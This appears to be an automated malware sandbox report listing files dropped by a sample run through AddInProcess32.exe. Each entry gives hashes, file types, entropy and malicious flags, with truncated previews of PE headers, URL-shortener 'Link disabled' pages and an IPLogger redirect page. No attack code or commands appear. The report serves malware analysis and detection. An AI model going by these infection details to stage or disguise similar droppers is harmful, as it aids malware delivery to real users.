                                                                                                                                                                                                                                                            SHA1:93A73A1679265A71E42A4D4F7DB2099EF109DF85
                                                                                                                                                                                                                                                            SHA-256:9537BAD08DE11149D3EA8528EE94E9FEB7927D69E933315357D3F466312ADE3E
                                                                                                                                                                                                                                                            SHA-512:D5CC6E876EF7B05EC4A18C20C3D2E600247B35D69D0DC9F4576408BE781C127DDE22C7220C6CEB83987D6C07380A6240EFA6B82ED8C750E6E32F14DA2DCE1F89
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.591439924230012
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:QUnvbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:RvbGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:30B1B56E37A9DBE68B65CD002F85D36D
                                                                                                                                                                                                                                                            SHA1:176F8A38FD3E45B5FF45E4DB000CE6F3FBFA1429
                                                                                                                                                                                                                                                            SHA-256:013905AD9E37F10028A4671291A0A93625CCCF97DB4D7626436F9D7B27CD6C19
                                                                                                                                                                                                                                                            SHA-512:4A871D5340B6B1F096F8093522E8E6C32BE11D730E82BF01CD9EF2F3495B950134B34295524B4CB00981935AB4142151DA0606ED7348026491CFBC0C367E864C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="Llm9550BrFyiyZYo8WnXrIGIjMrygTdhLRy8sNWJ">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.589697665627802
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Q8vbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:RbGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:4F2CD595BBAAF3441F16DDEC2A160A17
                                                                                                                                                                                                                                                            SHA1:9582812FA4B03CCF57BF70167A66E14188C00379
                                                                                                                                                                                                                                                            SHA-256:5407ACA1D7782DFBC044E339250AB2F7F3FFD350CF46755C47EE08245D3982AE
                                                                                                                                                                                                                                                            SHA-512:75CE9411C009B0C104109D5C10B7F13266F00689CB4AC3BFB82F83FF68C2BFC594A5FA361E154B34A14AB895F8AEDC74E6B8CFA8B2CB5154CCD178270A124F2C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="bkIgx8Jnc0uMgGltcI99w2HJsgheg67V6NBD530q">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283768
                                                                                                                                                                                                                                                            Entropy (8bit):7.982051005050529
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:+2m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3H4:+LIvF/H3d7z7Y3UUtoH4
                                                                                                                                                                                                                                                            MD5:54F38AF9A5ADA40065F7B6008661E8A1
                                                                                                                                                                                                                                                            SHA1:6CE570E927D57E05F9FA25A37EAF0FB62CEFAF8A
                                                                                                                                                                                                                                                            SHA-256:AC365E2F49564BA5ABA374317FFB9AC29A20B338DB67DEC02D459C9AB85DE637
                                                                                                                                                                                                                                                            SHA-512:50DB5C233C258C0B99F868C4279CDBAB1FB252B5F87EFB207E865BA14F49ECC415AF329B379982072427120BF72250E434F1A9AD938342F3DFD40C31E84401D4
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283792
                                                                                                                                                                                                                                                            Entropy (8bit):7.9820526704646255
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:22m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3HH:2LIvF/H3d7z7Y3UUtoHH
                                                                                                                                                                                                                                                            MD5:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            SHA1:BF8C0FF33582B6CD9E2BBBB243B1F4551810ED56
                                                                                                                                                                                                                                                            SHA-256:7FBC9C8489F4AC1D85322892552012650A68307902FECEC265F01F994369A35E
                                                                                                                                                                                                                                                            SHA-512:E25315483A070AD2AF3876B8818DC25F491B91617987F30C10CEBE31177CB5FB08BA6DF20B898C19F06840CB6796E5B846ECF715A13A7BA88C46EFB0A393B957
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):323584
                                                                                                                                                                                                                                                            Entropy (8bit):6.109731815911019
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:HvEczeu14403Cgega/YYn13VguOBft5QRt15VbvVXbzMbtdu:PEcv144/getAfQZfbNrgzu
                                                                                                                                                                                                                                                            MD5:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            SHA1:0D89E46868396DF24B3113D778A9ACDD81ECBE2A
                                                                                                                                                                                                                                                            SHA-256:DB184DF3910B9B55E6F47E316D8F4CE4D9213A2BCA188A53201A57301352AA52
                                                                                                                                                                                                                                                            SHA-512:5D3CB21DCE95B6A9958205F794DB293EF75BB3ED1DCA9ED1ABC2A81D2D4D6CD9891A028FC7F325CF3D7DE91F75CF3D912FEE491947976A76C07E8B7A3EF9C977
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a.fL..5L..5L..5...5N..5k..5X..5k..5&..5k..5`..5...5C..5L..5...5k..5J..5k..5M..5RichL..5................PE..L...?..e.............................3............@.................................Ua......................................d...........X...............................................................@............................................text...\........................... ..`.rdata..............................@..@.data....-....... ..................@....rsrc...X...........................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|....p...............................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc........p......................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.605017626199463
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:QpYvbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:jbGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:DCDC0E11DB8E41D2820D5795541A9A31
                                                                                                                                                                                                                                                            SHA1:53C1D8B34BFB19D317396215009C578BDCA4C588
                                                                                                                                                                                                                                                            SHA-256:9620D42FC1944BDA67B72BC68E33A9DFDCB598F4AB795F80DB8FAEEB98D1F31D
                                                                                                                                                                                                                                                            SHA-512:DE5B0CBD74CEE1FD4A9E861B233F97B491C13C041F6B1E46203D406DC22501AF7B3FA6506668673684E4B29CB6BBE0156F4EF31BC73C0490A137D792F4B19064
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="FJNDnYI5mDUPWn1na0VszHBNAXQlUkP2CQRFMTTa">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283768
                                                                                                                                                                                                                                                            Entropy (8bit):7.982051005050529
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:+2m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3H4:+LIvF/H3d7z7Y3UUtoH4
                                                                                                                                                                                                                                                            MD5:54F38AF9A5ADA40065F7B6008661E8A1
                                                                                                                                                                                                                                                            SHA1:6CE570E927D57E05F9FA25A37EAF0FB62CEFAF8A
                                                                                                                                                                                                                                                            SHA-256:AC365E2F49564BA5ABA374317FFB9AC29A20B338DB67DEC02D459C9AB85DE637
                                                                                                                                                                                                                                                            SHA-512:50DB5C233C258C0B99F868C4279CDBAB1FB252B5F87EFB207E865BA14F49ECC415AF329B379982072427120BF72250E434F1A9AD938342F3DFD40C31E84401D4
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.596757195928014
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Q1vbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:IbGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:5D75F2DA9A442FAC0B2BD9BFF04E909E
                                                                                                                                                                                                                                                            SHA1:4D186A164734C2DDFBEAD5C91646C4FE3CA76C5C
                                                                                                                                                                                                                                                            SHA-256:B3FA13B612AAA4979A7E36D879F37E673EAB817A39266152EA7930A1826C37EC
                                                                                                                                                                                                                                                            SHA-512:67710938384BFB132781F60B49AC07DF40D85C025D91151930476AF0F91F00554F74BADEE7D1137DF02348226FAE9F00F7DED82DB8A4CEB808C6B4AE700496B0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="TwACNll0R4RSVlFJopOZJncjv1Fy0gqNjFO84q0I">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.594677771219723
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Q3svbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:6YbGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:74446C42022C98940CD36557F86CF70F
                                                                                                                                                                                                                                                            SHA1:7BDA0A0ADF388D0A8453E6ABF95813C0FFA004FE
                                                                                                                                                                                                                                                            SHA-256:7B938756330EB7F068A6CEF946E48DA88A9DC29436B74D53C3E93CCC5723DC3C
                                                                                                                                                                                                                                                            SHA-512:84821078B56644983DE24D42B5D6F09418A6A494501222A91076E1F7952AF7500DA99A2EE3F7E3521A2A70D175B9740B5D4E29B7C1871BAC59A54554A4F45A2F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="BOPOOga9PnHIY4Wjqn43t1H2YlnkF1vf5vVtMpYI">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):323584
                                                                                                                                                                                                                                                            Entropy (8bit):6.109731815911019
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:HvEczeu14403Cgega/YYn13VguOBft5QRt15VbvVXbzMbtdu:PEcv144/getAfQZfbNrgzu
                                                                                                                                                                                                                                                            MD5:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            SHA1:0D89E46868396DF24B3113D778A9ACDD81ECBE2A
                                                                                                                                                                                                                                                            SHA-256:DB184DF3910B9B55E6F47E316D8F4CE4D9213A2BCA188A53201A57301352AA52
                                                                                                                                                                                                                                                            SHA-512:5D3CB21DCE95B6A9958205F794DB293EF75BB3ED1DCA9ED1ABC2A81D2D4D6CD9891A028FC7F325CF3D7DE91F75CF3D912FEE491947976A76C07E8B7A3EF9C977
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):7446
                                                                                                                                                                                                                                                            Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                                            MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                                            SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                                            SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                                            SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.594861019789154
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Qb2nvbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:w2bGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:0769572513C30B28FDE9AF98E9B13949
                                                                                                                                                                                                                                                            SHA1:41FB473DC320358B93B7221FABED7CA31669A302
                                                                                                                                                                                                                                                            SHA-256:F8F445EF6E8E3BF02685B83840F74B80FE01706080BE9613A78AC00A768B0505
                                                                                                                                                                                                                                                            SHA-512:8F41634995BCF5B16265BBD38B3027EFA578CB2B1DB18F489E0829FE858D8D9DABB661C6D43C6112E7207CF984CEC4AE61513026AD5CEC1E9F5E2E1EFCC16217
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="jYgOIngVfFmRJ6V6tU8oFQ1JEeyUog6pPo2mv5jN">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont
                                                                                                                                                                                                                                                            Process:C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):812
                                                                                                                                                                                                                                                            Entropy (8bit):7.387752072368675
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:Z6hR2MTR2d7NVM+uAR2CP0M9BHMvf9SJbsb:Z6WH1N2DAR2CP02xVg
                                                                                                                                                                                                                                                            MD5:1C3527F8FE5A24623BDD6AD96BF602FD
                                                                                                                                                                                                                                                            SHA1:BC988AD300CA4D581A7056BF8C342377D72D7C73
                                                                                                                                                                                                                                                            SHA-256:308DE7DA302D3ECF499B6C140B11FB3D9DB0D3B9515D8FA3DD0CE4A65659266C
                                                                                                                                                                                                                                                            SHA-512:5C54B19308985ED63EE59CDA2260B8651A27A79C2864DEBD349092FBACC15AD9D3DF309DBD3699684EBBC2751A8D5A6D8AC4E723C983A6272AE756AC58358D83
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Mar 11 01:31:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2677
                                                                                                                                                                                                                                                            Entropy (8bit):3.974904253270341
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:8FzdOTqu4WHoZidAKZdA19ehwiZUklqehGfy+3:8qnirhfy
                                                                                                                                                                                                                                                            MD5:CD33C81F268577EAB891800D36DC06BC
                                                                                                                                                                                                                                                            SHA1:71661EF3B39CD5668B45578C95517A2B1CEC8BB7
                                                                                                                                                                                                                                                            SHA-256:9EE953E8A817C5F6B291E69F792A50E5B07135AC611DD8CE3477A816D4E073BB
                                                                                                                                                                                                                                                            SHA-512:3EAD56604A5CFA77A2C24C2C6E386D85553538005770238E046A0ED6956D339F0C70B40F48654283D0A75797FBE7EA3D6C52BF6835EA417C0DEE3D268DC4C6D0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Mar 11 01:31:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2679
                                                                                                                                                                                                                                                            Entropy (8bit):3.9903311544318245
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:8FgdOTqu4WHoZidAKZdA1weh/iZUkAQkqehRfy+2:8bniZ9QEfy
                                                                                                                                                                                                                                                            MD5:261A6C8C507E64ABA04807BA86F96683
                                                                                                                                                                                                                                                            SHA1:E41C882E7E521636852075FD3FC13BD819F38B5A
                                                                                                                                                                                                                                                            SHA-256:E37FFF0DD103B6FD2AE453B3AF7E8025B38B7345CF26018DF45A4CC6E4CE674B
